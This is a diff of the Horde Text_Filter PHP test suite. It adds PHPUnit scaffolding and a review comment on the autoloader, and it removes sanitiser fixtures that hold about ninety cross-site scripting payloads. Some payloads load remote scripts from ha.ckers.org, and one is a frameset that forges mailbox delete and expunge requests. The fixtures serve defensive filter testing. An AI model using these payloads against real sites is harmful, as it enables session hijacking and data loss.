<dir name="Filter">
<dir name="fixtures">
<file name="html2text.html" role="test" />
- <file name="style_xss01.html" role="test" />
<file name="text2html.txt" role="test" />
- <file name="xss01.html" role="test" />
- <file name="xss02.html" role="test" />
- <file name="xss03.html" role="test" />
- <file name="xss04.html" role="test" />
- <file name="xss05.html" role="test" />
- <file name="xss06.html" role="test" />
- <file name="xss07.html" role="test" />
- <file name="xss08.html" role="test" />
- <file name="xss09.html" role="test" />
- <file name="xss10.html" role="test" />
- <file name="xss11.html" role="test" />
- <file name="xss12.html" role="test" />
- <file name="xss13.html" role="test" />
- <file name="xss14.html" role="test" />
- <file name="xss15.html" role="test" />
- <file name="xss16.html" role="test" />
- <file name="xss17.html" role="test" />
- <file name="xss18.html" role="test" />
- <file name="xss19.html" role="test" />
- <file name="xss20.html" role="test" />
- <file name="xss21.html" role="test" />
- <file name="xss22.html" role="test" />
- <file name="xss23.html" role="test" />
- <file name="xss24.html" role="test" />
- <file name="xss25.html" role="test" />
- <file name="xss26.html" role="test" />
- <file name="xss27.html" role="test" />
- <file name="xss28.html" role="test" />
- <file name="xss29.html" role="test" />
- <file name="xss30.html" role="test" />
- <file name="xss31.html" role="test" />
- <file name="xss32.html" role="test" />
- <file name="xss33.html" role="test" />
- <file name="xss34.html" role="test" />
- <file name="xss35.html" role="test" />
- <file name="xss36.html" role="test" />
- <file name="xss37.html" role="test" />
- <file name="xss38.html" role="test" />
- <file name="xss39.html" role="test" />
- <file name="xss40.html" role="test" />
- <file name="xss41.html" role="test" />
- <file name="xss42.html" role="test" />
- <file name="xss43.html" role="test" />
- <file name="xss44.html" role="test" />
- <file name="xss45.html" role="test" />
- <file name="xss46.html" role="test" />
- <file name="xss47.html" role="test" />
- <file name="xss48.html" role="test" />
- <file name="xss49.html" role="test" />
- <file name="xss50.html" role="test" />
- <file name="xss51.html" role="test" />
- <file name="xss52.html" role="test" />
- <file name="xss53.html" role="test" />
- <file name="xss54.html" role="test" />
- <file name="xss55.html" role="test" />
- <file name="xss56.html" role="test" />
- <file name="xss57.html" role="test" />
- <file name="xss58.html" role="test" />
- <file name="xss59.html" role="test" />
- <file name="xss60.html" role="test" />
- <file name="xss61.html" role="test" />
- <file name="xss62.html" role="test" />
- <file name="xss63.html" role="test" />
- <file name="xss64.html" role="test" />
- <file name="xss65.html" role="test" />
- <file name="xss66.html" role="test" />
- <file name="xss67.html" role="test" />
- <file name="xss68.html" role="test" />
- <file name="xss69.html" role="test" />
- <file name="xss70.html" role="test" />
- <file name="xss71.html" role="test" />
- <file name="xss72.html" role="test" />
- <file name="xss73.html" role="test" />
- <file name="xss74.html" role="test" />
- <file name="xss75.html" role="test" />
- <file name="xss76.html" role="test" />
- <file name="xss77.html" role="test" />
- <file name="xss78.html" role="test" />
- <file name="xss79.html" role="test" />
- <file name="xss80.html" role="test" />
- <file name="xss81.html" role="test" />
- <file name="xss82.html" role="test" />
- <file name="xss83.html" role="test" />
- <file name="xss84.html" role="test" />
- <file name="xss85.html" role="test" />
- <file name="xss97.html" role="test" />
- <file name="xss98.html" role="test" />
- <file name="xss99.html" role="test" />
- <file name="xss100.html" role="test" />
</dir> <!-- /test/Horde/Text/Filter/fixtures -->
+ <file name="AllTests.php" role="test" />
+ <file name="Autoload.php" role="test" />
+ <file name="XssTest.php" role="test" />
<file name="emails.phpt" role="test" />
<file name="environment.phpt" role="test" />
<file name="html2text.phpt" role="test" />
<file name="html2text2.phpt" role="test" />
+ <file name="phpunit.xml" role="test" />
<file name="space2html.phpt" role="test" />
<file name="text2html.phpt" role="test" />
- <file name="xss.phpt" role="test" />
</dir> <!-- /test/Horde/Text/Filter -->
</dir> <!-- /test/Horde/Text -->
</dir> <!-- /test/Horde -->
--- /dev/null
+<?php
+/**
+ * All tests for the Horde_Text_Filter:: package.
+ *
+ * PHP version 5
+ *
+ * @category Horde
+ * @package Text_Filter
+ * @author Michael Slusarz <slusarz@curecanti.org>
+ * @license http://www.fsf.org/copyleft/lgpl.html LGPL
+ * @link http://pear.horde.org/index.php?package=Text_Filter
+ */
+
+/**
+ * Define the main method
+ */
+if (!defined('PHPUnit_MAIN_METHOD')) {
+ define('PHPUnit_MAIN_METHOD', 'Horde_Text_Filter_AllTests::main');
+}
+
+/**
+ * Prepare the test setup.
+ */
+require_once 'Horde/Test/AllTests.php';
+
+/**
+ * @package Text_Filter
+ * @subpackage UnitTests
+ */
+class Horde_Text_Filter_AllTests extends Horde_Test_AllTests
+{
+}
+
+Horde_Text_Filter_AllTests::init('Horde_Text_Filter', __FILE__);
+
+if (PHPUnit_MAIN_METHOD == 'Horde_Text_Filter_AllTests::main') {
+ Horde_Text_Filter_AllTests::main();
+}
--- /dev/null
+<?php
+/**
+ * Setup autoloading for the tests.
+ *
+ * PHP version 5
+ *
+ * @category Horde
+ * @package Text_Filter
+ * @author Gunnar Wrobel <wrobel@pardus.de>
+ * @license http://www.fsf.org/copyleft/lgpl.html LGPL
+ * @link http://pear.horde.org/index.php?package=Text_Filter
+ */
+
+if (!spl_autoload_functions()) {
+ spl_autoload_register(
+ create_function(
+ '$class',
+ '$filename = str_replace(array(\'::\', \'_\'), \'/\', $class);'
+ . '$err_mask = E_ALL ^ E_WARNING;'
+ . '$oldErrorReporting = error_reporting($err_mask);'
+ . 'include "$filename.php";'
+ . 'error_reporting($oldErrorReporting);'
+ )
+ );
+}
+
+/** Catch strict standards */
+error_reporting(E_ALL | E_STRICT);
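Review bot: The autoloader body is assembled as a string and handed to `create_function`, which evaluates that string as code at runtime and is deprecated since PHP 7.2 and removed in PHP 8.0. A named function passed to `spl_autoload_register` does the same job and still works on PHP 5.2. The generated body also turns the class name straight into an include path (`include "$filename.php";`) with warnings masked, so a name containing path characters is looked up as given and a missing file fails silently. Rejecting names outside the expected class-name alphabet before the include keeps the lookup inside the include path. The function name in the sketch below is a placeholder.

```php
function Horde_Text_Filter_Test_autoload($class)
{
    // Only plain class names are mapped to files; anything else is ignored.
    if (!preg_match('/^[A-Za-z0-9_:]+$/', $class)) {
        return;
    }
    $filename = str_replace(array('::', '_'), '/', $class);
    // Mask only E_WARNING so a missing file does not abort the autoload chain.
    $oldErrorReporting = error_reporting(E_ALL ^ E_WARNING);
    include "$filename.php";
    error_reporting($oldErrorReporting);
}

if (!spl_autoload_functions()) {
    spl_autoload_register('Horde_Text_Filter_Test_autoload');
}
// … unchanged: error_reporting(E_ALL | E_STRICT) …
```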
+++ /dev/null
-<BASE HREF="javascript:alert('XSS');//">
+++ /dev/null
-<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS');">
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC=JaVaScRiPt:alert('XSS')>
+++ /dev/null
-<IMG SRC=javascript:alert("XSS")>
+++ /dev/null
-<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+++ /dev/null
-<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+++ /dev/null
-<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<img src='blank.jpg'style='width:expression(alert("xssed"))'>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC="jav ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav	ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav
ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav
ascript:alert('XSS');">
+++ /dev/null
-<IMG
-SRC
-=
-j
-a
-v
-a
-s
-c
-r
-i
-p
-t
-:
-a
-l
-e
-r
-t
-(
-'
-X
-S
-S
-'
-)
-"
->
+++ /dev/null
-<IMG SRC="  javascript:alert('XSS');">
+++ /dev/null
-<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+++ /dev/null
-<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<<SCRIPT>alert("XSS");//<</SCRIPT>
+++ /dev/null
-<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+++ /dev/null
-<SCRIPT SRC=//ha.ckers.org/.j>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS')"
+++ /dev/null
-<iframe src=http://ha.ckers.org/scriptlet.html <
+++ /dev/null
-<SCRIPT>a=/XSS/
-alert(a.source)</SCRIPT>
+++ /dev/null
-</TITLE><SCRIPT>alert("XSS");</SCRIPT>
+++ /dev/null
-<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+++ /dev/null
-<BODY BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<BODY ONLOAD=alert('XSS')>
+++ /dev/null
-<IMG DYNSRC="javascript:alert('XSS')">
+++ /dev/null
-<IMG LOWSRC="javascript:alert('XSS')">
+++ /dev/null
-<BGSOUND SRC="javascript:alert('XSS');">
+++ /dev/null
-<BR SIZE="&{alert('XSS')}">
+++ /dev/null
-<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+++ /dev/null
-<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+++ /dev/null
-<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+++ /dev/null
-<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+++ /dev/null
-<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
+++ /dev/null
-<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+++ /dev/null
-<XSS STYLE="behavior: url(xss.htc);">
+++ /dev/null
-<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
+++ /dev/null
-<IMG SRC='vbscript:msgbox("XSS")'>
+++ /dev/null
-<IMG SRC="mocha:[code]">
+++ /dev/null
-<IMG SRC="livescript:[code]">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+++ /dev/null
-<IFRAME SRC=javascript:alert('XSS')></IFRAME>
+++ /dev/null
-<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
+++ /dev/null
-<TABLE BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<TABLE><TD BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+++ /dev/null
-<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
+++ /dev/null
-<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+++ /dev/null
-<DIV STYLE="width: expression(alert('XSS'));">
+++ /dev/null
-<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+++ /dev/null
-<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+++ /dev/null
-<XSS STYLE="xss:expression(alert('XSS'))">
+++ /dev/null
-exp/*<A STYLE='no\xss:noxss("*//*");
-xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
+++ /dev/null
-<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+++ /dev/null
-<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
+++ /dev/null
-<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+++ /dev/null
-<!--[if gte IE 4]>
-<SCRIPT>alert('XSS');</SCRIPT>
-<![endif]-->
+++ /dev/null
-<BASE HREF="javascript:alert('XSS');//">
+++ /dev/null
-<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+++ /dev/null
-<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+++ /dev/null
-<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+++ /dev/null
-<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
+++ /dev/null
-<HTML xmlns:xss>
- <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
- <xss:xss>XSS</xss:xss>
-</HTML>
+++ /dev/null
-<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
-</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+++ /dev/null
-<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
-<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+++ /dev/null
-<XML SRC="xsstest.xml" ID=I></XML>
-<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+++ /dev/null
-<HTML><BODY>
-<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
-<?import namespace="t" implementation="#default#time2">
-<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
-</BODY></HTML>
+++ /dev/null
-<SCRIPT SRC="http://ha.ckers.org/xss.jpg"><SCRIPT>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS')"
+++ /dev/null
-<SCRIPT a=">" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT =">" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=">" '' SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT "a='>'" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/a.js"></SCRIPT>
+++ /dev/null
-<a href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=" href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=">Click me</a>
+++ /dev/null
-<a href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=">Click me</a>
+++ /dev/null
-<body/onload=alert(/xss/)>
+++ /dev/null
-<frameset rows="15,15,15,15,15,15,15,15,15,*">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=199&indices%5B%5D=200&indices%5B%5D=201&indices%5B%5D=202&indices%5B%5D=203&indices%5B%5D=204&indices%5B%5D=205&indices%5B%5D=206&indices%5B%5D=207&indices%5B%5D=208&indices%5B%5D=209&indices%5B%5D=210&indices%5B%5D=211&indices%5B%5D=212&indices%5B%5D=213&indices%5B%5D=214&indices%5B%5D=215&indices%5B%5D=216&indices%5B%5D=217&indices%5B%5D=218&indices%5B%5D=219&indices%5B%5D=220&indices%5B%5D=221&indices%5B%5D=222&indices%5B%5D=223&indices%5B%5D=224&indices%5B%5D=225&indices%5B%5D=226&indices%5B%5D=227&indices%5B%5D=228&indices%5B%5D=229&indices%5B%5D=230&indices%5B%5D=231&indices%5B%5D=232&indices%5B%5D=233&indices%5B%5D=234&indices%5B%5D=235&indices%5B%5D=236&indices%5B%5D=237&indices%5B%5D=238&indices%5B%5D=239&indices%5B%5D=240&indices%5B%5D=241&indices%5B%5D=242&indices%5B%5D=243&indices%5B%5D=244&indices%5B%5D=245&indices%5B%5D=246&indices%5B%5D=247&indices%5B%5D=248&indices%5B%5D=249&indices%5B%5D=250&indices%5B%5D=251&indices%5B%5D=252&indices%5B%5D=253&indices%5B%5D=254&indices%5B%5D=255&indices%5B%5D=256&indices%5B%5D=257&indices%5B%5D=258&indices%5B%5D=259&indices%5B%5D=260&indices%5B%5D=261&indices%5B%5D=262&indices%5B%5D=263&indices%5B%5D=264&indices%5B%5D=265&indices%5B%5D=266&indices%5B%5D=267&indices%5B%5D=268&indices%5B%5D=269&indices%5B%5D=270&indices%5B%5D=271&indices%5B%5D=272&indices%5B%5D=273&indices%5B%5D=274&indices%5B%5D=275&indices%5B%5D=276&indices%5B%5D=277&indices%5B%5D=278&indices%5B%5D=279&indices%5B%5D=280&indices%5B%5D=281&indices%5B%5D=282&indices%5B%5D=283&indices%5B%5D=284&indices%5B%5D=285&indices%5B%5D=286&indices%5B%5D=287&indices%5B%5D=288&indices%5B%5D=289&indices%5B%5D=290&indices%5B%5D=291&indices%5B%5D=292&indices%5B%5D=293&indices%5B%5D=294&indices%5B%5D=295&indices%5B%5D=296&indices%5B%5D=297&indices%5B%5D=298">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=299&indices%5B%5D=300&indices%5B%5D=301&indices%5B%5D=302&indices%5B%5D=303&indices%5B%5D=304&indices%5B%5D=305&indices%5B%5D=306&indices%5B%5D=307&indices%5B%5D=308&indices%5B%5D=309&indices%5B%5D=310&indices%5B%5D=311&indices%5B%5D=312&indices%5B%5D=313&indices%5B%5D=314&indices%5B%5D=315&indices%5B%5D=316&indices%5B%5D=317&indices%5B%5D=318&indices%5B%5D=319&indices%5B%5D=320&indices%5B%5D=321&indices%5B%5D=322&indices%5B%5D=323&indices%5B%5D=324&indices%5B%5D=325&indices%5B%5D=326&indices%5B%5D=327&indices%5B%5D=328&indices%5B%5D=329&indices%5B%5D=330&indices%5B%5D=331&indices%5B%5D=332&indices%5B%5D=333&indices%5B%5D=334&indices%5B%5D=335&indices%5B%5D=336&indices%5B%5D=337&indices%5B%5D=338&indices%5B%5D=339&indices%5B%5D=340&indices%5B%5D=341&indices%5B%5D=342&indices%5B%5D=343&indices%5B%5D=344&indices%5B%5D=345&indices%5B%5D=346&indices%5B%5D=347&indices%5B%5D=348&indices%5B%5D=349&indices%5B%5D=350&indices%5B%5D=351&indices%5B%5D=352&indices%5B%5D=353&indices%5B%5D=354&indices%5B%5D=355&indices%5B%5D=356&indices%5B%5D=357&indices%5B%5D=358&indices%5B%5D=359&indices%5B%5D=360&indices%5B%5D=361&indices%5B%5D=362&indices%5B%5D=363&indices%5B%5D=364&indices%5B%5D=365&indices%5B%5D=366&indices%5B%5D=367&indices%5B%5D=368&indices%5B%5D=369&indices%5B%5D=370&indices%5B%5D=371&indices%5B%5D=372&indices%5B%5D=373&indices%5B%5D=374&indices%5B%5D=375&indices%5B%5D=376&indices%5B%5D=377&indices%5B%5D=378&indices%5B%5D=379&indices%5B%5D=380&indices%5B%5D=381&indices%5B%5D=382&indices%5B%5D=383&indices%5B%5D=384&indices%5B%5D=385&indices%5B%5D=386&indices%5B%5D=387&indices%5B%5D=388&indices%5B%5D=389&indices%5B%5D=390&indices%5B%5D=391&indices%5B%5D=392&indices%5B%5D=393&indices%5B%5D=394&indices%5B%5D=395&indices%5B%5D=396&indices%5B%5D=397&indices%5B%5D=398">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=399&indices%5B%5D=400&indices%5B%5D=401&indices%5B%5D=402&indices%5B%5D=403&indices%5B%5D=404&indices%5B%5D=405&indices%5B%5D=406&indices%5B%5D=407&indices%5B%5D=408&indices%5B%5D=409&indices%5B%5D=410&indices%5B%5D=411&indices%5B%5D=412&indices%5B%5D=413&indices%5B%5D=414&indices%5B%5D=415&indices%5B%5D=416&indices%5B%5D=417&indices%5B%5D=418&indices%5B%5D=419&indices%5B%5D=420&indices%5B%5D=421&indices%5B%5D=422&indices%5B%5D=423&indices%5B%5D=424&indices%5B%5D=425&indices%5B%5D=426&indices%5B%5D=427&indices%5B%5D=428&indices%5B%5D=429&indices%5B%5D=430&indices%5B%5D=431&indices%5B%5D=432&indices%5B%5D=433&indices%5B%5D=434&indices%5B%5D=435&indices%5B%5D=436&indices%5B%5D=437&indices%5B%5D=438&indices%5B%5D=439&indices%5B%5D=440&indices%5B%5D=441&indices%5B%5D=442&indices%5B%5D=443&indices%5B%5D=444&indices%5B%5D=445&indices%5B%5D=446&indices%5B%5D=447&indices%5B%5D=448&indices%5B%5D=449&indices%5B%5D=450&indices%5B%5D=451&indices%5B%5D=452&indices%5B%5D=453&indices%5B%5D=454&indices%5B%5D=455&indices%5B%5D=456&indices%5B%5D=457&indices%5B%5D=458&indices%5B%5D=459&indices%5B%5D=460&indices%5B%5D=461&indices%5B%5D=462&indices%5B%5D=463&indices%5B%5D=464&indices%5B%5D=465&indices%5B%5D=466&indices%5B%5D=467&indices%5B%5D=468&indices%5B%5D=469&indices%5B%5D=470&indices%5B%5D=471&indices%5B%5D=472&indices%5B%5D=473&indices%5B%5D=474&indices%5B%5D=475&indices%5B%5D=476&indices%5B%5D=477&indices%5B%5D=478&indices%5B%5D=479&indices%5B%5D=480&indices%5B%5D=481&indices%5B%5D=482&indices%5B%5D=483&indices%5B%5D=484&indices%5B%5D=485&indices%5B%5D=486&indices%5B%5D=487&indices%5B%5D=488&indices%5B%5D=489&indices%5B%5D=490&indices%5B%5D=491&indices%5B%5D=492&indices%5B%5D=493&indices%5B%5D=494&indices%5B%5D=495&indices%5B%5D=496&indices%5B%5D=497&indices%5B%5D=498">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=499&indices%5B%5D=500&indices%5B%5D=501&indices%5B%5D=502&indices%5B%5D=503&indices%5B%5D=504&indices%5B%5D=505&indices%5B%5D=506&indices%5B%5D=507&indices%5B%5D=508&indices%5B%5D=509&indices%5B%5D=510&indices%5B%5D=511&indices%5B%5D=512&indices%5B%5D=513&indices%5B%5D=514&indices%5B%5D=515&indices%5B%5D=516&indices%5B%5D=517&indices%5B%5D=518&indices%5B%5D=519&indices%5B%5D=520&indices%5B%5D=521&indices%5B%5D=522&indices%5B%5D=523&indices%5B%5D=524&indices%5B%5D=525&indices%5B%5D=526&indices%5B%5D=527&indices%5B%5D=528&indices%5B%5D=529&indices%5B%5D=530&indices%5B%5D=531&indices%5B%5D=532&indices%5B%5D=533&indices%5B%5D=534&indices%5B%5D=535&indices%5B%5D=536&indices%5B%5D=537&indices%5B%5D=538&indices%5B%5D=539&indices%5B%5D=540&indices%5B%5D=541&indices%5B%5D=542&indices%5B%5D=543&indices%5B%5D=544&indices%5B%5D=545&indices%5B%5D=546&indices%5B%5D=547&indices%5B%5D=548&indices%5B%5D=549&indices%5B%5D=550&indices%5B%5D=551&indices%5B%5D=552&indices%5B%5D=553&indices%5B%5D=554&indices%5B%5D=555&indices%5B%5D=556&indices%5B%5D=557&indices%5B%5D=558&indices%5B%5D=559&indices%5B%5D=560&indices%5B%5D=561&indices%5B%5D=562&indices%5B%5D=563&indices%5B%5D=564&indices%5B%5D=565&indices%5B%5D=566&indices%5B%5D=567&indices%5B%5D=568&indices%5B%5D=569&indices%5B%5D=570&indices%5B%5D=571&indices%5B%5D=572&indices%5B%5D=573&indices%5B%5D=574&indices%5B%5D=575&indices%5B%5D=576&indices%5B%5D=577&indices%5B%5D=578&indices%5B%5D=579&indices%5B%5D=580&indices%5B%5D=581&indices%5B%5D=582&indices%5B%5D=583&indices%5B%5D=584&indices%5B%5D=585&indices%5B%5D=586&indices%5B%5D=587&indices%5B%5D=588&indices%5B%5D=589&indices%5B%5D=590&indices%5B%5D=591&indices%5B%5D=592&indices%5B%5D=593&indices%5B%5D=594&indices%5B%5D=595&indices%5B%5D=596&indices%5B%5D=597&indices%5B%5D=598">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=599&indices%5B%5D=600&indices%5B%5D=601&indices%5B%5D=602&indices%5B%5D=603&indices%5B%5D=604&indices%5B%5D=605&indices%5B%5D=606&indices%5B%5D=607&indices%5B%5D=608&indices%5B%5D=609&indices%5B%5D=610&indices%5B%5D=611&indices%5B%5D=612&indices%5B%5D=613&indices%5B%5D=614&indices%5B%5D=615&indices%5B%5D=616&indices%5B%5D=617&indices%5B%5D=618&indices%5B%5D=619&indices%5B%5D=620&indices%5B%5D=621&indices%5B%5D=622&indices%5B%5D=623&indices%5B%5D=624&indices%5B%5D=625&indices%5B%5D=626&indices%5B%5D=627&indices%5B%5D=628&indices%5B%5D=629&indices%5B%5D=630&indices%5B%5D=631&indices%5B%5D=632&indices%5B%5D=633&indices%5B%5D=634&indices%5B%5D=635&indices%5B%5D=636&indices%5B%5D=637&indices%5B%5D=638&indices%5B%5D=639&indices%5B%5D=640&indices%5B%5D=641&indices%5B%5D=642&indices%5B%5D=643&indices%5B%5D=644&indices%5B%5D=645&indices%5B%5D=646&indices%5B%5D=647&indices%5B%5D=648&indices%5B%5D=649&indices%5B%5D=650&indices%5B%5D=651&indices%5B%5D=652&indices%5B%5D=653&indices%5B%5D=654&indices%5B%5D=655&indices%5B%5D=656&indices%5B%5D=657&indices%5B%5D=658&indices%5B%5D=659&indices%5B%5D=660&indices%5B%5D=661&indices%5B%5D=662&indices%5B%5D=663&indices%5B%5D=664&indices%5B%5D=665&indices%5B%5D=666&indices%5B%5D=667&indices%5B%5D=668&indices%5B%5D=669&indices%5B%5D=670&indices%5B%5D=671&indices%5B%5D=672&indices%5B%5D=673&indices%5B%5D=674&indices%5B%5D=675&indices%5B%5D=676&indices%5B%5D=677&indices%5B%5D=678&indices%5B%5D=679&indices%5B%5D=680&indices%5B%5D=681&indices%5B%5D=682&indices%5B%5D=683&indices%5B%5D=684&indices%5B%5D=685&indices%5B%5D=686&indices%5B%5D=687&indices%5B%5D=688&indices%5B%5D=689&indices%5B%5D=690&indices%5B%5D=691&indices%5B%5D=692&indices%5B%5D=693&indices%5B%5D=694&indices%5B%5D=695&indices%5B%5D=696&indices%5B%5D=697&indices%5B%5D=698">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="http://secunia.com/">
-</frameset>
+++ /dev/null
-<img src=""> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"" />
--- /dev/null
+<?xml version="1.0" encoding="UTF-8"?>
+<phpunit>
+ <filter>
+ <whitelist>
+ <directory suffix=".php">../../../../lib</directory>
+ </whitelist>
+ </filter>
+</phpunit>
+++ /dev/null
---TEST--
-Horde_Text_Filter_Xss tests
---FILE--
-<?php
-
-/* Test cases from http://ha.ckers.org/xss.html */
-
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter.php';
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter/Base.php';
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter/Xss.php';
-require dirname(__FILE__) . '/../../../../../Util/lib/Horde/String.php';
-require dirname(__FILE__) . '/../../../../../Util/lib/Horde/Util.php';
-
-foreach (glob(dirname(__FILE__) . '/fixtures/xss*.html') as $file) {
- echo basename($file) . "\n" .
- Horde_Text_Filter::filter(file_get_contents($file), 'xss') .
- "\n";
-}
-
-foreach (glob(dirname(__FILE__) . '/fixtures/style_xss*.html') as $file) {
- echo basename($file) . "\n" .
- Horde_Text_Filter::filter(file_get_contents($file), 'xss', array(
- 'strip_styles' => false
- )) .
- "\n";
-}
-
-?>
---EXPECT--
-xss01.html
-
-xss02.html
-<img/>
-xss03.html
-<img/>
-xss04.html
-<img/>
-xss05.html
-<img/>
-xss06.html
-<img says=""/>
-xss07.html
-<img/>">
-
-xss08.html
-<img/>
-xss09.html
-<img/>
-xss10.html
-<img src="                       "/>
-xss100.html
-<img src="blank.jpg"/>
-xss11.html
-<img/>
-xss12.html
-<img/>
-xss13.html
-<img/>
-xss14.html
-<img/>
-xss15.html
-<img/>
-xss16.html
-<img src="j" a="" v="" s="" c="" r="" i="" p="" t="" :="" l="" e="" x=""/>
-xss17.html
-<img/>
-xss18.html
-
-xss19.html
